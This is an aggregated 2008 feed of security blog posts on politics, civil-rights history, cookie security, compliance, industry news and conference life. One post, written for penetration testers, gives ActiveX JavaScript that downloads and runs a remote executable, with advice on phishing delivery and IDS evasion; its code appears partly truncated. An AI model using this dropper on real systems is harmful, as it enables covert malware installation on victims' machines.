Saturday, August 30, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

"... one day live in a nation where they will not be judged by the color of their skin, but by the content of their character" [StillSecure, After All These Years]

Posted: 29 Aug 2008 03:37 PM CDT

Colorful people for a Better World, Barack Obama, Martin Luther King (Ben Heine) by Ben Heine.Republican or Democrat, liberal or conservative, white, black, brown, red or yellow, as an American you had to feel proud last night. To see that as a country we have come to a point that one of the two mainstream political parties would nominate an African-American person for the office of the Presidency of the United States of America was a big step.  Whether you think Barack Obama is good or bad, whether you vote for him or not, what he has accomplished within one lifetime of Martin Luther King's "I have a dream" speech is truly amazing. Similar to what he said last night, it is not just about him either.  It is about us as a country as well.  Our country has grown enough where truly the color of a persons skin is not the determining factor on what a person can accomplish. I am not naive. I know that there are still people in this country who are going to decide to support Obama or not strictly on the color of his skin.  For those people I feel sorry. Support or don't support Obama because you think he is or is not the right person for the job, but not because of the color of his skin. 

I was reminded exactly what a huge step this was in reading Adam's Emergent Chaos blog today.  He has republished the testimony of a woman to the credentials committee of the 1964 Democratic national convention.  I don't want to reprint the whole thing, so please click here and than hit back on your browser when you are done.

Back already? What do you think?  Can you believe that this horrific story was just over 40 years ago.  Not to brag about my age, but I was alive when this happened.  I remember being bussed to a different neighborhood for school.  There were race riots in 1968.  Can this be the same country? 

And now we have a woman as the VP candidate for the Republicans.  This is probably almost 20 years after Geraldine Ferraro ran for the Democrats, but is nevertheless quite a milestone. 

Whomever you vote for this election day, it is a proud day to be an American and that old adage of anyone can grow up to be President is truer than ever!

44 Years [Emergent Chaos]

Posted: 29 Aug 2008 11:11 AM CDT

Fannie Lou Hamer.jpg

Mary Dudziak posted the testimony of Fannie Lou Hamer before the credentials committee of the 1964 Democratic convention. It's worth reading in full:

Mr. Chairman, and to the Credentials Committee, my name is Mrs. Fannie Lou Hamer, and I live at 626 East Lafayette Street, Ruleville, Mississippi, Sunflower County, the home of Senator James O. Eastland, and Senator Stennis.

It was the 31st of August in 1962 that eighteen of us traveled twenty-six miles to the county courthouse in Indianola to try to register to become first-class citizens.

We was met in Indianola by policemen, Highway Patrolmen, and they only allowed two of us in to take the literacy test at the time. After we had taken this test and started back to Ruleville, we was held up by the City Police and the State Highway Patrolmen and carried back to Indianola where the bus driver was charged that day with driving a bus the wrong color.

After we paid the fine among us, we continued on to Ruleville, and Reverend Jeff Sunny carried me four miles in the rural area where I had worked as a timekeeper and sharecropper for eighteen years. I was met there by my children, who told me that the plantation owner was angry because I had gone down to try to register.

After they told me, my husband came, and said the plantation owner was raising Cain because I had tried to register. Before he quit talking the plantation owner came and said, "Fannie Lou, do you know - did Pap tell you what I said?"

And I said, "Yes, sir."

He said, "Well I mean that." He said, "If you don't go down and withdraw your registration, you will have to leave." Said, "Then if you go down and withdraw," said, "you still might have to go because we are not ready for that in Mississippi."

And I addressed him and told him and said, "I didn't try to register for you. I tried to register for myself."

I had to leave that same night.

On the 10th of September 1962, sixteen bullets was fired into the home of Mr. and Mrs. Robert Tucker for me. That same night two girls were shot in Ruleville, Mississippi. Also Mr. Joe McDonald's house was shot in.

And June the 9th, 1963, I had attended a voter registration workshop; was returning back to Mississippi. Ten of us was traveling by the Continental Trailway bus. When we got to Winona, Mississippi, which is Montgomery County, four of the people got off to use the washroom, and two of the people - to use the restaurant - two of the people wanted to use the washroom.

The four people that had gone in to use the restaurant was ordered out. During this time I was on the bus. But when I looked through the window and saw they had rushed out I got off of the bus to see what had happened. And one of the ladies said, "It was a State Highway Patrolman and a Chief of Police ordered us out."...

I was carried to the county jail and put in the booking room. They left some of the people in the booking room and began to place us in cells. I was placed in a cell with a young woman called Miss Ivesta Simpson. After I was placed in the cell I began to hear sounds of licks and screams, I could hear the sounds of licks and horrible screams. And I could hear somebody say, "Can you say, 'yes, sir,' nigger? Can you say 'yes, sir'?"

And they would say other horrible names.

She would say, "Yes, I can say 'yes, sir.'"

"So, well, say it."

She said, "I don't know you well enough."

They beat her, I don't know how long. And after a while she began to pray, and asked God to have mercy on those people.

And it wasn't too long before three white men came to my cell. One of these men was a State Highway Patrolman and he asked me where I was from. I told him Ruleville and he said, "We are going to check this."

They left my cell and it wasn't too long before they came back. He said, "You are from Ruleville all right," and he used a curse word. And he said, "We are going to make you wish you was dead."

I was carried out of that cell into another cell where they had two Negro prisoners. The State Highway Patrolmen ordered the first Negro to take the blackjack.

The first Negro prisoner ordered me, by orders from the State Highway Patrolman, for me to lay down on a bunk bed on my face.

I laid on my face and the first Negro began to beat. I was beat by the first Negro until he was exhausted. I was holding my hands behind me at that time on my left side, because I suffered from polio when I was six years old.

After the first Negro had beat until he was exhausted, the State Highway Patrolman ordered the second Negro to take the blackjack.

The second Negro began to beat and I began to work my feet, and the State Highway Patrolman ordered the first Negro who had beat me to sit on my feet - to keep me from working my feet. I began to scream and one white man got up and began to beat me in my head and tell me to hush.

One white man - my dress had worked up high - he walked over and pulled my dress - I pulled my dress down and he pulled my dress back up.

I was in jail when Medgar Evers was murdered.

All of this is on account of we want to register, to become first-class citizens. And if the Freedom Democratic Party is not seated now, I question America. Is this America, the land of the free and the home of the brave, where we have to sleep with our telephones off the hooks because our lives be threatened daily, because we want to live as decent human beings, in America?

Thank you.

Setting the secure flag in the cookie is easy [EnableSecurity]

Posted: 29 Aug 2008 08:17 AM CDT

TechRepublic had an interesting article about the Surf Jack attack. Many people commented, some giving their own solution to the problem. However many of these solutions do not prevent the attack because they do not really address it. Of course, who ever missed the details should check out the paper.

The attack has been addressed quite a while ago, and the solution is easy to implement in many occasions. So no need to reinvent the wheel or create a new solution which has not been peer reviewed yet. Here I’ll indicate how to set the secure flag in various languages / web application technologies. The idea is that besides making use of HTTPS instead of HTTP, one needs to set a flag in the cookie so that it cannot be leaked out in clear text.


bool setcookie ( string $name [, string $value [, int $expire [, string $path [, string $domain [, bool $secure [, bool $httponly ]]]]]] )
Note that the $secure boolean should be set to true.
Cookie helloCookie = new Cookie(”name”,text);

HttpCookie cookie = new HttpCookie(’name’);
cookie.Secure = True;
cookie.Value = ‘Joe’;

My Idle Threat Needs Adapting []

Posted: 28 Aug 2008 10:39 PM CDT

What is my idle threat?  That I was going to delete their boot.ini file.  A covert operation that could easily be done remotely and may not be detected for days, weeks or months.  Like the title implies though, I’ve never actually deleted someones boot.ini file.  Now I must adapt my threat.

Vista no longer contains the object of my desire.  Boot.ini has been replaced along with a few other things involved in the boot process.  NTLDR has been replaced with the “Windows Boot Manager” and winload.exe.  Instead of NTDLR reading the boot.ini file, Windows Boot Manager, after reading the Boot Configuration Data (BCD), starts winload.exe to load the operating system.

Boot Configuration Data is stored in a hidden file (BCD) in c:\boot\.  To modify this file you use a command line utility called BCDedit.exe.

So there you have it.  My new idle threat is going to be stealing their power cable.

Its The Most Wonderful Time Of The Year []

Posted: 28 Aug 2008 09:39 PM CDT

The long, long wait is over.  College football is here!  Its been a very long offseason for us Husker fans.  After last years debacle of a season we are eager to get this season started and put last season in the rear view mirror.  I’m not expecting a miracle season but I think a 7-5 record is the most likely record with 8-4 a possibility if they catch a break.

Saturday night Nebraska plays Western Michigan.  The ‘Skers are a 14 point favorite and I think they cover.  NU 34  WMU 14


SANS Mentor update [Kees Leune]

Posted: 28 Aug 2008 07:03 PM CDT

The nice people over at SANS just put up my course details. Before registering, please contact me for a referral code, or send me an email at

The Problem with Compliance (Updated) [Ascension Blog]

Posted: 28 Aug 2008 09:33 AM CDT

The following is a piece that was originally written for Network World’s Security Newsletter and published in March of 2006.  It was a collaborative effort between Joe Faraone, a close friend, and I.  The issue we touched on really hasn’t gone away so I thought that I’d dust it off and update it a bit. 

Sometimes we hear senior managers and executives expressing frustration with government regulation by saying that the issue has come down to a choice of either being secure or being compliant.  In fact Compliance remains the number one driver of information security as reported in the 10th Annual Global Information Security Survey conducted by Ernst & Young. 

This is consistent with the article that sparked the original version of this post.  That was an Information Security Magazine article from October 2005 in which security managers were asked to respond to the question, “What is your biggest obstacle to implementing and managing security related government regulations?” Responses reveal that the top two obstacles faced were unclear compliance related responsibilities and interpreting regulatory language. This point of view appears to be more prevalent in the private sector than the public sector.

One of the reasons for this discrepancy is that the public sector must follow a specific framework for measuring the maturity and effectiveness of its information security programs: certification and accreditation (C&A). The Federal Information Security Management Act of 2002 (FISMA) was intended to provide for the development of and maintenance of minimum controls required to protect information systems and to provide for a framework for ensuring the effectiveness of these controls. While many of the overriding principles followed in C&A are contained within the law, nowhere are the words “certification” or “accreditation” found.

FISMA points to the Office of Management and Budget (OMB) as well as the National Institute of Standards and Technology (NIST) to obtain guidance. OMB has issued its Circular A130, which requires that all federal information systems to be certified and accredited following guidelines developed by NIST.

Now the C&A process has gotten a lot of bad press, some of it well deserved but coming from someone who has worked with the process in one form or another for the past ten years I’d say that it comes down to a matter of implementation rather than issues with the process itself.  If the process is viewed as just another paper exercise intended to satisfy auditors then it is a waste of time but it is also missing the forest for the trees. 

NIST has done a laudable job of developing and revising this guidance. It provides a methodology to fully document, measure, assess, track and report on the health of information systems from the aspect of security. These guidelines show how to integrate an information security program with the systems development lifecycle as well as how to test the implemented controls.

Those in the private sector are probably wondering why this should be important to them.  Many argue that the control sets mandated by the process are too much for a private sector environment.  Implementing the full set of baseline controls would be too costly and provide little ROI others say.  Again, my response is that you’re missing the forest for the trees.  The process itself is what is valuable here and is flexible enough to allow any set of requirements to be utilized not just the set of baseline controls provided by NIST. 

NIST publications and the methodology for conducting certification and accreditation are freely available and constitute an untapped publicly available security resource. Inputting the government regulations (Sarbanes Oxley, Health Insurance Portability and Accountability Act, etc.) into this framework allows the private sector to document, measure, assess, track and report upon the security posture of their information systems and how well government regulations are adhered to. The private sector can assess the maturity of their information security programs and determine how well these programs integrate into their overall business processes.

What is key for the private sector is that the process must be tailored to your environment and needs.  Herein lies the problem that has plagued C&A from its beginning - it is often applied improperly. 

When the emphasis is placed on being compliant, people go through the motions and focus on technology and checking boxes rather than leveraging the power of the framework to assess the effectiveness of their programs.

The two most basic elements of any system are often overlooked or underemphasized: the information being protected and the people who use the information. You can put in all the high security devices you want in a system, but if you do not account for the people who need to use the information system and the criticality of the information within the system, you still will not be secure.

If the C&A process is improperly applied then it does result in a lot of wasted time and paperwork. If it is properly applied then it becomes a wonderful tool to assess the effectiveness of your security controls - everything from policy and procedure down to control functionality and configuration.  It provides a holistic view of the network and security with the emphasis on being secure. Compliance is simply a milestone on that journey.

The beauty of this is that the information that you need to implement this framework is _free_ and fully available at the NIST Web site. Do you need to hire high priced consultants to come and set this up for you? No, you don’t. Although consultants can save you some time on the learning curve, the guidance available through NIST will allow you to begin the process on your own. You can then use consultants to give you an independent review of your program or to bolster areas where you might feel less comfortable. But remember that you must tailor this framework to fit your environment - use what works and make sense and discard that which does not.  (Sorry government readers - this doesn’t apply to you.  You don’t have the same latitude to do that as does the private sector.)

The CIO implementing this approach can concentrate on the details of how information is protected and used rather than scurrying about wondering how to bring order to the new herd of cats that legislation has unleashed.

Take the framework that NIST has so diligently given us, plug in the requirements that you are subject to, and then sit down with your network architects, your user representatives and your key project managers and find a way to work efficiently but securely. With the NIST framework, you will be able to assess, measure, track, and deliver a more secure and user friendly network and in the process, achieve compliance.  I have done this with amazing results so I know for a fact that it works. 

Alternatively, keep enjoying your view of the forest.

Thanks for Understanding [Ascension Blog]

Posted: 28 Aug 2008 09:15 AM CDT

I’d like to apologize to everyone for being a bit lax over the last week or so.  When you start your own small business you must often wear many different hats.  It also means that there are often not that many people, if any at all, to delegate to.  I’ve spent the last week working on a few proposal responses so I have been writing - just not material for the blog. 

I also took a trip to Washington DC to meet with a few clients and potential clients.  I decided to stay with family which was nice but they don’t have Internet connectivity at their home.  I know that is a surprising thing in today’s world but they really don’t and I don’t think it is economical to get dial-up service for the few times that I’m there during the year.  (Does anyone else inwardly cringe when they hear the word dial-up?)

Now they have been trying to rectify the situation.  They live out in a rural area (as much as any area within the DC commuting area is still rural) so they have had to pay to have fiber run out to them.  Apparently it isn’t as easy as calling and having your local telecom run the line.  It takes some doing.  There is one group that comes out to run it down the public highway but they stop there.  Another group then must come out and run it up the driveway.  Since my family lives off a shared driveway this apparently requires two separate groups to run it up to their home.  One for the shared driveway and another for their private driveway.  And yet another group must then come and set it up in the house. 

Now it has been six months since this process has started.  I sat in the living room and could actually see the fiber sticking out of the ground down at the top of the shared driveway.  Just a little bit to go before it actually gets into to the house.  It was frustrating but not frustrating enough to pack up my laptop and head down to the Starbucks to pick up a wifi connection.  Hopefully the situation will be rectified before I go and visit in December. 

Anyway - I was able to locate a few old articles that I’ve dusted off to post here.  It feels a bit like cheating but I think the topics are still relevant and like I said I did spend a few minutes reworking them a bit.  Once I get this proposal put to bed this week I’ll work on a few posts for next week.  There is a lot of material just not enough time to get to it. 

Thanks for understanding.

Cisco buys Exchange-a-like vendor PostPath [Richi Jennings]

Posted: 28 Aug 2008 05:41 AM CDT

Updated with more commentary 4.16pm UTC. Hello, Techmeme.

Suddenly, things are getting interesting again in the Exchange-alternatives market.

The quintessential growth-by-acquisition specialist, Cisco (CSCO), has just announced that it's acquiring PostPath.

Once again, Cisco makes a sound investment in an email technology vendor. Just like it did with IronPort. Great choice.

These are the clever guys who reverse-engineered the Exchange client protocol, MAPI/RPC, and the related on-the-wire details needed to make a vanilla install of Outlook talk to a non-Exchange mail server with full fidelity. Impressive stuff.

Despite Om Malik's analysis, this is quite a bit different from Zimbra.

Of all the other Exchange alternatives, PostPath has the most interesting architecture. And I say that as one who has years emotionally invested in the HP OpenMail technology ;-)

All the others rely on additional software on the desktop. In the case of OpenMail/SamsungContact/Scalix/Domino/etc., a MAPI service provider "plugin". Or, like Bynari/OpenXchange/etc., a separate app that synchronized an IMAP store with an Outlook.PST (personal store file).

I think Cisco fell out of love with Microsoft a while back. Something to do with VoIP support in Exchange and how Cisco thought it was Microsoft's partner but it turned out that Microsoft was competing with them. Nothing familiar there at all...

Sounds like Cisco wants to offer SaaS collaboration, based on PostPath and WebEx. Whoever said the email world has become dull and uninteresting?

Thanks to Jeff Brainard for the tip.

5th Website Security Statistics Report [Jeremiah Grossman]

Posted: 27 Aug 2008 06:11 PM CDT

For the last month I've been compiling our third quarter 2008 Website Security Statistics Report, which contains a comprehensive vulnerability analysis of over 600 real live websites. We're talking 11,000 verified vulnerabilities collected from typically weekly assessments. This type of data is not available from reports by Symantec, Mitre (CVE), IBM X-Force, SANS, or anywhere else and we're excited to be able to share it.

We put a ton of work into this report and there is a massive amount of data. Highlights include a revised Top Ten list of vulnerabilities, updated Time-to-Fix metrics, vulnerability remediation percentages showing progress, vertical market comparison, and so on. The information is really valuable because it provides visibility into the future trends, trouble spots, and what action items should be considered.

On Wednesday, August 27th, 11:00 AM PDT I'll be hosting an hour-long webinar to go over the results. Attendees will be given the opportunity to be the first to see the results and ask questions. Registration is free, but space is limited. If you are interested in attending, now is the time to register.

Western Union MTCN trojan [mxlab - all about anti virus and anti spam]

Posted: 27 Aug 2008 05:06 PM CDT

MX Lab just interceped a bunch of emails from Western Union claiming that your credit card issuing bank has halted the transaction by the demand of the Federal Criminal Investigation Service. Sound really scarry at first.

The senders address is spoofed and random, the subject contains “Western Union MTCN #5993705206″. The numbers and even the subject itself can change during the distribution later on.

The content of the email:


Attention! The wire sent to Maksim Zverev, Moscow, Russia has been blocked by our security service.

Your credit card issuing bank has halted the transaction by the demand of the Federal Criminal Investigation Service (case No. 42976 since the recipient has been undergoing the international retrieval by the InterPol.

Please contact the closest Western Union office and make sure you have your ID card, the credit card that was used for making the payment, and the invoice file with you.

(The invoice file is attached to this message; please print it out and hand it to our agent.)

You can find the address of the closest Western Union agent on our website at

Thank you!

First of all, the senders address and the first paragraph of the email must identify this emails as suspicious and dangerous. Did you send a wire to someone in Russia, lately? The chance is quite small I think.

Furthermore, an invoice in a Zip archive that is an executable. Even if your anti virus engine isn’t up to date yet, it should be clear to anyone that this is a virus. Only one anti virus engine, Sophos, detects the trojan at the moment so be carefull.

And yes, our ZBot trojan is back again as a new variant. It’s a banking trojan that disables firewall, steals sensitive financial data (credit card numbers, online banking login details), makes screen snapshots, downloads additional components, and provides a hacker with the remote access to the compromised system.

Some files are created on your system like %System%\oembios.exe (it’s alias is Mal/EncPk-CZ [Sophos]PWS:Win32/Zbot.gen!B [Microsoft]).

The folder %System%\sysproc64 will be created for %System%\sysproc64\sysproc32.sys and %System%\sysproc64\sysproc86.sys. Windows registry is being modified and a connection to an external IP on port 80 is being made to with a GET request bone/no.bin.

Virus Total permalink and MD5: 07b8c31d8519f04103cde011d24c82ec.

Owning the Client without an Exploit [Carnal0wnage Blog]

Posted: 27 Aug 2008 04:45 PM CDT

So after a long hiatus of no posts I figured it was time to step up and post something that may be of interest to pentesters. In the spirit of continuity to some previous posts about client-side attacks and as a follow up to some discussions that Chris and I have been having, this post will be about Client-side Ownage.

It's nothing groundbreaking but may have a place in your arsenal of tools and attack vectors. What do you do when all those cool client-side attacks in Metasploit fail? Damn those companies that patch 3rd party products. As shown in the previous posts it's still possible to gather a great deal of information about the remote user, host and network using PHP and some Java but what do you do when you need a foothold on that host to pivot further into the network?

Enter the Dropper. Using JavaScript and Microsoft's XMLHTTPRequest Object it is possible to download and run your backdoor with just a little interaction from the victim. The XMLHTTPRequest Object, a core component of AJAX, provides support for client-side communication with a HTTP server. A user can make use of the XMLHTTP Object to send a request and have the XML DOM parse that request. Great if you have data such as XML that you need to parse and display on a page for example.

What about requesting another file type like, oh I don't know, an exe? This might have some value. :) Lets take a look at a JavaScript function to do just that.

First we need to create our object elements and the required attributes needed to download and execute the file we want:

function dropper() {

var x = document.createElement('object');

try {
var obj = x.CreateObject('msxml2.XMLHTTP','');
var app = x.CreateObject('Shell.Application','');
var str = x.CreateObject('','');

We use document.createElement to create an element and use it in conjunction with setAttribute to modify the attributes of each new element. The classid in use is a Remote Data Service object. It allows the execution of code from a remote source. Search your registry and you'll see that it is assigned to RDS.DataSpace, a non-visual ActiveX control, which handles remote data connections. This function is part of Microsoft's MDAC.

We create our msxml2.XMLHTTP object which will handle communication with the web server that is hosting our executable.

Then we use the Object element to instantiate a Shell Object which is identified by the CLASSID.

The ADODB.Stream object in ActiveX, which contains methods to manage a stream of binary data or text, is used to handle the storing and saving of the data to a file.

Now let's grab the file, install it to a directory of our choice and run it.

try {
str.type = 1;'GET','',false);
var path = './/..//svchosts.exe';
catch(e) {}

First we use the Type property to set the type of data in the stream object. 1 is for Binary.

Next we use the XMLHTTPRequest Open Method intialize an MSXML2.XMLHTTP request in which we specify the retrieval method, URL and authentication information if any. The XMLHTTPRequest Send Method allows us to send the HTTP request to the server.

The Open Method is used to create and open a Stream opject. The Write Method is used to write the binary data to a binary Stream object. After specifying the path we now use the SaveToFile method is used to save contents of our open Stream object to a local file of our choosing. In this case we use am option value of 2 that overwrites the file if it already exists. We then close the object.

The next step is to use our Shell Object to execute our newly downloaded executable using the shellexecute function.

try {
catch(e) {}
catch(e) {}

Place this code in a webpage either directly or through an include, create a good phishing email (see other posts) and send it off to your victims. Before anyone makes mention that this requires ActiveX to run remember that enough users will allow ActiveX controls to be run for it to be useful. On I.E. 6 this should perform a silent download and on I.E. 7 it will prompt the user.

You can add additional code to the page to check the browser version and prompt the user to either change to IE or have a direct link to the file for the user to click and run. Remember it just takes one user that follows the link to give you access.

One other thing to consider is IDS/IPS evasion. The code above will likely get flagged by an IDS in the form it is now. Look at JavaScript obfuscation techniques such as 'string-splitting', arguments.callee() and other methods to evade the IDS or just hide your code.

Variants of this method we have just discussed are actually widely used by malware authors on their sites to drop files onto users systems. Have a look at the next spam email you get and decode the JavaScript on the page.


Off to Black Hat [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:30 PM CDT

Let me run with the pack and put up my own "off to Black Hat" post.  I leave Tuesday actually and won't get there until Tuesday evening.  I will be on a red eye home Thursday night/Friday morning.  In this way I don't break my own three day rule on Vegas.  What is my three day rule?  Suffice to say that it prevents me from spiraling down into the bowels of degeneracy.

So what am I looking forward to at Black Hat?  The Dan K / DNS stuff should be fun.  I will be cheering on my boy Hoff and I always sit in on Jeremiah.  But lets face it, I am there for the party and catching up.  I am looking forward to throwing a few back with Rothman.  Seeing Martin, Mogul and the rest of the bunch.  There are always good parties of course and free drinks and food never hurts.

Of course I will also spend some time at the StillSecure booth shaking hands and kissing babies.  If you would like to say hello feel free to stop on by.

Also, a quick thanks to all of the members of the SBN for their support on our Black Hat affiliation.  The last few weeks have seen a bunch of blogs raising the buzz on the conference.

Zemanta Pixie

Black Hat wrap up - secure@microsoft, booth babes and bloggers [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:28 PM CDT

You can read plenty of other blogs about some of the great presentations at Black Hat.  So I thought I would take another angle and talk about some of the other stuff that may be important to you.


1.  Picture – This years hottest party was again the Microsoft party.  This year it was at the LAX club in the Luxor.  As usual there were quite a number of people at the door who thought they could talk their way in or worse yet were told they "were one the list".  I was happy to be able to go and saw many of the usual suspects there as well. I had to leave the party early to go catch my red eye flight home, so went right to the airport from the party.  As I wrote earlier, Microsoft is trying really hard on security.  But I couldn't help but notice the irony of this grainy, lousy picture of the DJ booth at the party.  If you can, notice the computers that the DJs are using. That's right they are Macs!

Edge_os_3 2. A new low for booth babes – What would a Shimel review of a trade show be without a booth babe rant.  Hey I recognize it is Vegas and all, but EdgeOS went way over the line this year.  A booth babe dressed as a Las Vegas showgirl or some other type of costume makes a statement.  I personally don't like exploiting woman to make that statement, but I understand.  However, these guys had woman who were dressed so raunchy and classless, that I could not bring myself to post a picture of them.  Come on guys!  You want to resort to the booth babe thing (and BTW I think the Black Hat crowd does not respond to that), at least have a little class.  These girls looked like street walkers and do you and your company no favors.  Is that really the image you want to promote?  Grow up!

Authors note: I have received several requests to see a picture of the booth babes in question and judge for yourself. So I am including for you to make your own call


3.  The Security Bloggers Network – We are back!  With the end of the Black Hat show, the SBN is going back to being the SBN.  The old logo is back and our promotion with Black Hat is at an end.  However, I want to personally thank so many of you SBN members who blogged about Black Hat.  The Black Hat marketing folks made it a point to come over to me and thank us for the overwhelming support and help of the community.  Our network delivered big time with them and they are already thinking about ways we can work together next year.  I will keep you all posted on that.


securitybloggersWe have several new promotions we are working on with the SBN and will have more on that soon. Also, we learned some valuable lessons.  Next time we will work with the network members more closely in doing these affiliations.  Also, for any show like this we need to have an official bloggers get together.  Not because we don't want to buy our own drinks (thanks to Chris Hoff for doing more than his share in picking up a big bar tab), but frankly we need to reserve a place that has enough space for us.  Security bloggers are big time. We have a great community of people who get together. Lets make it better.


I have some other ideas around the SBN I am working on too and want to form a committee to help. If you are a member and want to get involved, please drop me a line or comment.


Anyway, another year of Black Hat is in the books. It was a good one and I can't wait until next year!


Pedal to the metal NAC [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:26 PM CDT

OK, I am not really a big car racing fan.  I don't know, Long Island was not a NASCAR hot bed. Of course the Indy 500 was always big news.  In any event I have become much more of a race fan since Chip Ganassi racing became a StillSecure customer.  They are using a complete NAC solution that performs both pre and post connect testing. Racing today is not about some gearheads putting in spark plugs and changing tires.  It is high, hi-tech and their information security needs to protect their IP are high priority. 

Rather than the usual case study, our VP of marketing Jayson Ayers actually tried something new.  A video case study is what we have done.  I think it is pretty cool and in the spirit of the YouTube generation, am embedding it here.  You can read more about this on our site here.


This posting includes an audio/video/photo media file: Download Now

My excellent adventure at Black Hat [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:26 PM CDT

Yesterday was a great day at Black Hat. I would tell you all about it, but it seems Mitchell thinks that it best that we don't talk about what goes on here at Black Hat. Now, far be it from me to break "Cardinal Rules" (has anyone ever really thought about what exactly is a "cardinal rule"? Why not a Blue Jay or Falcon rule?) but if we can't talk about it, what good is it. I think Mitchell is confusing divulging the really juicy Vegas stuff, from just the mundane. So let me tell you about my excellent adventure yesterday at Black Hat.

I was one of the multitude standing in the back listening to Dan's DNS report. You probably have already heard that it is bigger and worse than originally reported. I than spent a lot of time with the Microsoft people talking to them about their security stuff. I will tell you that despite many who rail against Microsoft, these guys actually are doing a great job on security and in dealing with the security community. Much better than a certain company named for a fruit whose marketing people killed the presentation of their own security research team. After lunch I took a front row seat to watch Hoff present on virtual security. He has some very pretty slides, but the message was clear. Great presentation by Hoff. I spent most of the rest of the afternoon catching up with lots of security bloggers here. I am amazed by the number of us here at Black Hat.

Had a quiet dinner with Mitchell (I would tell you about it but you know about what happens in Vegas with Mitchell) and than went to the Breach party at the Shadow Bar (I love that place, but it was too hot last night). We than went over to the Fuente cigar bar and next thing you know we were joined by about 30 of our closest security blogger buddies. It was a great time and their are pictures floating around twitter somewhere of it. We talked and laughed into the late hours, winding up at the Augustus cafe again for an early breakfast.

Well it is back to the show today and another round of parties tonight. Ah, it is tough living the life ;-)

Zemanta Pixie

When the shoe is on the other foot [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:26 PM CDT

About to head over to morning sessions of Black Hat (OK, it started at 8am, but that is just an uncivil time for Las Vegas).  Before I do, let me give you a quick recap of my first night on Black Hat. I didn't get in until 10pm and got to my hotel about 11.  Looked up a few security twits and saw that Mitchell Ashley, Martin McKeay, JJ and Ryan Russell were at the Cleopatra Barge at Caesars.  I headed over there and met up.  The night was on!

pussycat-dolls-lounge We had a quick drink and then headed over to the club Pure, where Fortify was having a party.  Some how or another JJ, Ryan and I got to the VIP entrance and were headed in.  Martin had to go upstairs and change out of his shorts.  Mitchell that Colorado country bumpkin was not allowed in because he was wearing sandals.  What to do?  Leave Mitchell outside, all of us not go in? I went back to my old club hopping days for the answer. I went  in with JJ.  Went to the bar, took off my shoes and gave them to JJ.  While I stood there in socks, she brought the shoes out to Mitchell, who put them on and got in the club.  Watching JJ sneak out the shoes and Mitchell walk in holding his sandals was pretty funny.   But it worked.  We got away from the Fortify party as it was way too crowded.  We found ourselves in my favorite part of Pure, the Pussycat Doll Lounge.  Five minutes later out came the Pussycats.  They put on a very hot show that had us all dancing and shouting. 

After that we went to my usual late night spot at Black Hat, the Augustus cafe for breakfast.  We met up with the Mogul and Hoff, who joined us.  By now it was like 2:30am Vegas time (5:30 east coast time) and it was time for bed.  I am staying at Paris, so had a nice walk but they did give me a LeMans suite which is very nice.  I still get a little confused by rooms with bidets, but it is fun.

Well off to Black Hat for some learning!

Revisiting the good enough generation [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:26 PM CDT

Thats right, talkin' 'bout my, my g-g-g-generation. The generation where good enough, is . . . good enough. There is no sense of being the best you can be or going over and above. Just enough to get it done is the way of the world. So with Rothman revisiting Big is the New Small, I thought another look at the good enough generation was in order. It was just over two years ago, that I wrote the original "Is good enough security, good enough"

Now with hindsight it appears Mike and I were saying very close to the same thing. That the sad truth is that for most people having security that is good enough, is enough for them. Subsequently if the big guy has good enough, why bother with dealing with a multitude of vendors and tower of babel security infrastructure. So after all this time Mike is not entirely wrong.

However, I still believe that there is a percentage of the world that doesn't buy into the just good enough theory. For folks like that given the resources, being the best they can be is the way of the world. If I didn't believe that, I would not be as jazzed about building a company like StillSecure as I am.

Another fantasy fulfilled [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:26 PM CDT

landon and brad My Grandmother always told me that a lucky person can count the really good friends they have on one hand, but a small amount of good friends far outweigh having many acquaintances. That was proven to me once again this weekend.  Ever since before I had my 2 sons, I had dreams of taking my children to both a Pittsburgh Steeler game and a NY Yankee game. Last year I had a chance to take Landon and Bradley to Pittsburgh and see a Steeler game.  With this being the last year for the old Yankee Stadium, I wanted to take the boys to see the Yankees at home and in the old stadium. 

Getting tickets to a game at Yankee Stadium is not cheap.  In looking around StubHub, for a hundred bucks a ticket (which is all I was willing to pay), the best I was going to do was out in the bleachers somewhere. But I figured it was better than nothing and was going to go for it.  That was when I called my best buddy from college Tyler to see if he wanted to go with us.  Tyler still lives in NY, actually he has an apt in Trump Palace and works in advertising for a large company, handling one of the very biggest accounts.  When I told him what I was looking at buying he said to hold on and let him see what he could do.

Well Tyler came through big time.  Not sure which vendor he got them from, but we had 6th row box seats behind third base, tickets to the Stadium Club, free parking (didn't use it as we took the subway) and to top it off, Tyler was staying at his friends place and insisted we stay in his place at Trump. 

The boys and I had a blast hanging out in the city, going to Dylan's candy store, the Empire State Building and then heading up to the Stadium.  I am sure it will be a time both they and I will never forget.  Like the commercial says:

1. 3 round trip airline tickets from Florida to NY – $750.00

2. 1 night in a hotel in NYC - $400.00

3. 3 field box seats to a Yankee game - $1000.00

4. A fried like Tyler to make it all happen for free (I used miles for the airfare) and give the kids this kind of memory– PRICELESS!

Thanks Tyler!

Windows Vista update through malware Flash swf file [mxlab - all about anti virus and anti spam]

Posted: 27 Aug 2008 01:06 PM CDT

An email with the subject “RE: ® Official Update 2008!” is trying to attract your attention to a new Windows XP/Vista update. The email message contains a large title “Free Update Windows XP, Vista” with an URL.

Following the link leads to an hosted .swf file, a Flash animation, that is hosted at

The file itself is of course malware so be aware not to follow the link, download or execute the install.exe file.

Things I Learned at 3am This Morning [The Falcon's View]

Posted: 27 Aug 2008 10:52 AM CDT

*yawn* Hi folks! Proud papa here, just providing some quick thoughts that I'm sure other parents will find amusing. We've survived our first night with a newborn. She apparently likes to sleep in the morning and stay up fussy all...

No comments: